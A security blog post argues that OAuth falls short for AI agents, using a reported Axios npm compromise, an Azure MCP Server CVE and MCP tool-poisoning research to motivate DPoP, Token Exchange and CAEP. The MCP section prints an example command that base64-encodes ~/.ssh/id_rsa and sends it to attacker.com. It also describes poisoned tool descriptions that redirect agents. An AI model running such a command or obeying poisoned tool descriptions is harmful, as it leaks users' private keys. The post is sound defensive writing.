"Only 10% of organizations deploying AI agents have governance in place. Yet 91% are already using them." — RSAC 2026
80 million+ enterprises introduced a new identity-bearing risk surface with zero controls. This is the week the bill came due.
What happened on March 31?
Late on March 31, 2026, a maintainer of Axios — the HTTP client that 150 million+ downstream projects rely on every week — pushed two new versions to npm: axios@1.14.1 and axios@0.30.4. Minutes later, a hidden dependency inside those releases started phoning home to an attacker-controlled endpoint.
The maintainer hadn't been phished. He hadn't reused a password. He had MFA enabled. He had a hardware key. And none of it mattered.
For the previous two weeks, a North Korean group Microsoft Threat Intelligence tracks as UNC1069 had been building an alternate reality around him. A cloned Slack workspace. AI-generated deepfake video calls from a fake colleague. A fake LinkedIn profile that matched a real contact in his graph. On March 29, through that social channel, the maintainer opened something he shouldn't have on his developer machine. UNC1069 harvested a valid, unexpired npm session token from his browser storage and walked straight past MFA.
By April 1, Microsoft had the attribution. By April 3, Microsoft Security Response Center was publishing CVE-2026-32211: a CVSS 9.1 missing-authentication flaw in the Azure MCP Server. By April 15, Cloudflare had rushed Managed OAuth for agent-ready apps into general availability. In between, Ox Security disclosed a systemic flaw in MCP itself, and OWASP released its first-ever Top 10 for Agentic Applications, peer-reviewed by over 100 experts.
Four events. Seventeen days. One through-line: OAuth, as we know it, was never designed for agents. And agents are here.
5-Minute Skim
The convergence. Agent adoption hit 91% of enterprises before governance hit 10%. MCP — the protocol everyone is wiring agents through — has no built-in auth. Azure's reference implementation shipped without auth (CVE-2026-32211). 5.5% of public MCP servers already contain poisoned tool descriptions. A single session-token theft compromised a package with 150M weekly downloads.
Default recommendation. Stop issuing long-lived agent tokens. Migrate agent-to-service calls to RFC 8693 Token Exchange. Bind tokens to the agent's public key via DPoP (RFC 9449). Wire CAEP so revocation propagates in seconds. Treat MCP servers as hostile code.
Where it breaks. OAuth2 assumes a human in the loop, a browser with PKCE, and refresh measured in hours. Agents call each other thousands of times per second, delegate to other agents, and run unattended for days.
Key trade-off. Long-lived tokens (24h-7d) are simpler but create Axios-style blast radius. Short-lived tokens align with CAEP revocation but hammer your IdP. The industry is converging on three tiers: human-initiated actions get 5-60 minute tokens, agent-to-agent hops get milliseconds-to-seconds plus DPoP, and batch jobs get single-purpose scoped credentials.
Why this week?
Three events collided inside a single news cycle, and they're not coincidental — they're the same underlying failure mode surfacing in three places.
April 3 — CVE-2026-32211. Microsoft disclosed that the Azure MCP Server — the reference implementation everyone copy-pastes from — shipped with missing authentication on its management endpoints. CVSS 9.1. An attacker with network reachability could enumerate and invoke registered tools without any credential. This is the auth layer simply not being there.
April 14 — Ox Security's MCP disclosure. Ox published research showing a systemic flaw in MCP's STDIO interface: tool descriptions are injected into the LLM's context, so a malicious description can rewrite the agent's intent. Their scan of public MCP servers found 5.5% already contained poisoned descriptions. With auto-approve enabled, their attack succeeded 84.2% of the time. The ecosystem: 150M+ downloads.
April 15 — Cloudflare Managed OAuth. Cloudflare Access rolled out Managed OAuth for agent-ready apps. The significance isn't the feature — it's the positioning. Cloudflare explicitly framed OAuth2 as insufficient for agentic traffic and shipped a managed layer handling Token Exchange, DPoP binding, and CAEP. When Cloudflare rewrites its own identity story in a week, the industry has moved.
Behind all three: OWASP's Top 10 for Agentic Applications 2026, peer-reviewed by 100+ contributors, lists "Identity & Authentication Failures" and "Tool Poisoning" in the top five. For the first time, AppSec guidelines agree that agent identity is a distinct category.
Why does OAuth break for agents?
OAuth2 was designed in 2012 for a specific world: a human clicks "Allow" in a browser, a web app gets a token, and the token is used to call an API on that human's behalf for the next hour. Every primitive in the spec assumes those constraints.
Agents break every one of them:
No human in the loop. An agent orchestrating at 3 a.m. cannot pop a consent screen. The authorization_code grant is unusable. Teams fall back to client_credentials, which gives the agent its own identity but loses "on behalf of the user" context. Audit trails go dark.
Multi-hop delegation. A planner agent calls a research agent, which calls a code-execution agent, which calls an MCP tool. OAuth has no native model for this. The OBO extension papers over it, but semantics vary across IdPs.
Token lifetimes are wrong at both ends. A 1-hour token is too long for an agent making 10k calls/sec — one leaked token is catastrophic. It's too short for a batch agent running 8 hours; refresh logic leaks into every tool call. OAuth assumes a human-scale cadence that fits neither.
Tokens aren't bound to anything. Bearer tokens mean whoever holds them, owns them. In a browser, that's contained. In an agent mesh where tokens traverse queues, logs, shell subprocesses, and sidecars, bearer semantics are indefensible. UNC1069 proved it: a stolen bearer token bypassed MFA.
Policy enforcement is too slow. Tokens are validated once at issuance. But an agent's context changes mid-task. Without CAEP, the IdP can't say "that token you issued 30 seconds ago? Revoke it now." At human speed, 30 seconds is fine. At agent speed, it's thousands of requests.
No attribute-based scoping. OAuth scopes are coarse strings — read:email, write:files. Agents need context-aware policy: "this agent can read files tagged public from tenant X when invoked by user Y during business hours." That's ABAC, and OAuth has no hook for it.
Taken together, these aren't six small gaps — they're one structural mismatch. OAuth was built for a browser visiting a web app. Agents are neither.
Visual Architecture Model
Here is what agent-native authentication actually has to look like. A human authenticates once; every downstream hop is a token exchange with DPoP binding.
Three properties make this flow agent-native. First, the human authenticates exactly once, with PKCE, in a browser — the one place classic OAuth still works perfectly. Second, every hop after that is an RFC 8693 token exchange, which preserves the chain (subject_token = original user, actor_token = agent in the middle) so audit logs can reconstruct intent. Third, every agent-held token is cryptographically bound to that agent's key via DPoP — theft of the token alone is useless without the private key, which never leaves the agent's enclave.
The MCP supply-chain risk
The MCP (Model Context Protocol) ecosystem is where the agent identity crisis is hottest, because MCP was explicitly designed with auth as an afterthought. Its STDIO transport executes shell commands as tool invocations — which means the tool description the LLM reads and the shell command that runs are separated by nothing but trust.
Ox Security's April 14 disclosure walked through the mechanism. An MCP server registers a tool with a description like "git commit — commits staged changes". The LLM reads that description and invokes the tool. But nothing validates that the underlying shell command matches the description. A malicious server can register a tool described as "list files" and execute curl attacker.com/$(cat ~/.ssh/id_rsa | base64) instead. In agents with auto-approve (which, per OWASP, is the common default), the success rate in Ox's lab was 84.2%.
Their public scan found 5.5% of registered MCP servers already shipping with description/command mismatches — some intentional, some the result of copy-pasted examples from compromised tutorials. The surface area: every organization running GitHub Copilot Agent, Claude Desktop, Cursor, or any of the 150M+ installs across the MCP-aware tool ecosystem.
CVE-2026-32211 is the same disease in Microsoft's reference server: management endpoints with no auth, meaning anyone on the network can register a tool. Tool registration is the supply chain.
The lesson for architects: an MCP server is unverified code from an unknown publisher. Treat it the way you'd treat a browser extension asking for "read all your data on all websites." The answer is not faster review. The answer is isolation — MCP servers run in their own sandbox with their own scoped credentials, and their tool invocations are mediated by a policy engine the agent cannot bypass.
The Axios war story — what OAuth would have prevented
Let me walk the Axios timeline again, this time annotating what a properly-designed agent identity stack would have caught.
Early March. UNC1069 begins open-source recon. They identify the Axios maintainer, map his LinkedIn and GitHub graph, and build personas matching real contacts. OAuth caught nothing — this is social engineering, not credential theft. But a well-tuned ITDR system ingesting LinkedIn telemetry could have flagged the anomalous new connection pattern.
March 15-25. AI-generated deepfake video calls. A Slack workspace cloned pixel-for-pixel. A fake LinkedIn profile with a matching photo. Still no credential event. But note: every one of these attacks used identity signals (Slack tenant, LinkedIn profile, Zoom account) that a unified ITDR platform could correlate.
March 29. The maintainer's device is compromised through a social channel. A browser session token for npm's publishing API is harvested from local storage. This is the moment OAuth broke. The session token was bearer-semantic — possession equals authority. MFA was theater because MFA had already happened at login; the token was minted post-MFA and had hours of lifetime remaining.
March 31. UNC1069 publishes axios@1.14.1 and axios@0.30.4 using the stolen token. npm's registry had no contextual check: new publish from a new IP, new user-agent, new geography, outside the maintainer's usual publishing cadence. With CAEP signals wired into npm's identity provider, the session could have been revoked at the first anomalous publish. Instead, the token was accepted because it was structurally valid.
April 1. Microsoft Threat Intelligence attributes the compromise to UNC1069. 150M weekly downloads already exposed.
Three OAuth extensions would have changed the outcome:
- DPoP (RFC 9449) would have bound the session token to a key in the maintainer's browser. The harvested bearer token, lifted out of storage, would have been useless without the accompanying private key.
- CAEP would have let npm's IdP push a revocation when Microsoft's EDR flagged the device as compromised on March 29 — two days before the malicious publish.
- Token Exchange with short TTLs would have forced the publish operation to derive a short-lived, operation-scoped token, reducing the window of exploitability from "bearer token valid for hours" to "publish-scoped token valid for 30 seconds."
The broader point: MFA protects the login. It does not protect what happens after. Every identity layer that treats a session token as the end state is running the same risk Axios did. And agents, which by definition operate post-login for hours at a time, live entirely in that risk zone.
The six extensions agents demand
OAuth2 is not dead. But agents need six extensions layered on top of it before the protocol is usable at machine speed.
On-Behalf-Of (OBO). Originally a Microsoft extension, now widely supported. Lets a service exchange an incoming user token for a downstream token that preserves user context. Without OBO, an agent either impersonates the user (no audit trail) or acts as itself (loses user context). OBO is the minimum viable primitive for any agent that acts for a human.
Token Exchange (RFC 8693). The standardized, IdP-agnostic version of OBO, plus more. Supports subject_token + actor_token chains, so a multi-hop agent call preserves the full delegation chain. This is the spine of agent-to-agent delegation — every non-trivial agent architecture needs RFC 8693.
DPoP (RFC 9449). Demonstrating Proof-of-Possession. Binds a token to a key pair the client generates. Every request carries a signed proof. Stolen tokens become useless without the private key. If you adopt one thing from this list, adopt DPoP — it's the direct fix for the Axios class of attack.
PKCE (RFC 7636). Proof Key for Code Exchange. Mandatory for public clients (including agents running on user devices). Prevents authorization code interception. Already standard for mobile apps; must be standard for agents.
CAEP (OpenID Continuous Access Evaluation Profile). The revocation channel. IdP pushes signals — credential change, session revoked, device compromised, user disabled — to relying parties in real time. Without CAEP, token revocation is on the token-lifetime clock, which for agents is forever.
ABAC (Attribute-Based Access Control). Not a single spec but a category. Replaces coarse OAuth scopes with context-aware policy: agent identity + user identity + resource attributes + environmental attributes. OPA, Cedar, and Hexa are the open-source anchors. Without ABAC, you're back to the scope-string problem — an agent with write:files can write any file, forever.
Together these six don't replace OAuth; they rebuild OAuth into something appropriate for a world where identity traverses machines.
Trade-offs analysis
The core tension is token lifetime, and it resolves to a three-tier model — not a single answer.
Long-lived tokens (24h-7d) are tempting. Your agent grabs a token and runs. No refresh logic, no per-call latency. Operationally trivial. Axios is the counter-argument: one leaked token and the attacker has hours of authorized action. For any agent touching production, 24-hour tokens are indefensible.
Short-lived tokens (seconds-to-minutes) align with best practice. CAEP revocation actually works because the token rotates constantly. DPoP binding is cheap because the handshake is amortized across many requests. But two costs are real. First, IdP load — an agent making 10k requests/sec with 10-second tokens is issuing 1000 token exchanges per second. Your IdP needs to scale like a CDN. Second, latency — every hop adds a token exchange round-trip. For latency-sensitive agent chains (voice agents, trading agents), this shows up as user-visible lag.
The emerging consensus is tiered. Human-initiated actions get 5-60 minute tokens — the human is present, the session is interactive, rotation is a background concern. Agent-to-agent hops in a hot path get milliseconds-to-seconds lifetimes with DPoP binding — rotation is the point, revocation is instant, latency is managed through connection reuse. Background batch jobs get a third pattern: single-purpose, narrowly scoped, operation-bound tokens issued per task and discarded on completion.
Trust rings is the architectural frame. Think of your agent fleet as concentric rings. Inner ring: agents running inside your VPC, talking to your services. Tokens here can be slightly longer (minutes), DPoP-bound, with ABAC enforcement at the service mesh. Outer ring: agents calling third-party MCP servers or SaaS APIs. Tokens here are seconds-long, scoped to exactly one operation, and revoked on completion. The rings are not static — an agent can step from inner to outer mid-task, and the token regime changes with it.
Implementation insights
If you're architecting this today, three patterns are proving out in production.
Pattern 1 — Scoped carve-outs at the MCP boundary. Don't let agents call MCP servers with long-lived tokens. Insert a policy broker that receives the agent's intent, issues a single-purpose token bound to the specific tool invocation, and revokes it the moment the tool returns. Teams doing this report MCP-server blast radius dropping from "everything the agent can do" to "the one operation this call authorized."
Pattern 2 — Audit breadcrumbs via Token Exchange chains. When agent A exchanges its token for a downstream call to agent B, the resulting token carries both subject_token (the original human) and actor_token (agent A). Logging the full chain at every hop gives you a reconstructable audit trail: "at 03:14:07, user X's intent was carried by planner Y and executed by tool Z on resource R." Without this, agent mesh logs are a puddle of service-account IDs.
Pattern 3 — CAEP-wired IdP with ITDR. Wire your IdP's CAEP signals to your ITDR (Identity Threat Detection & Response) platform and back. Anomaly in agent behavior → ITDR alert → CAEP revoke → all downstream tokens invalidated within seconds. Gartner-referenced data shows ITDR adoption correlates with a 70% reduction in identity-based attack success rates. The Axios-class compromise is exactly what ITDR exists to catch before it propagates.
Actionable takeaways for Q2 2026
- Inventory every agent with identity access by May 1. You cannot govern what you cannot count. 91% of enterprises have agents; 10% know where they are. Start with IdP logs filtered by non-human user agents.
- Enable CAEP on your primary IdP this quarter. Okta, Entra, and Auth0 all ship it. The integration work is small; the revocation-latency reduction is enormous.
-
Migrate every agent-to-service call to RFC 8693 Token Exchange. No more
client_credentialsshortcuts. The audit chain is the payoff. - Ship DPoP on at least one high-value agent path. Start with the path that would cause the biggest Axios-shaped headline if compromised. Bind the tokens. Prove the flow.
- Deploy ITDR and connect it to CAEP. Make the revocation loop closed and automatic. Humans cannot revoke at agent speed.
Top comments (0)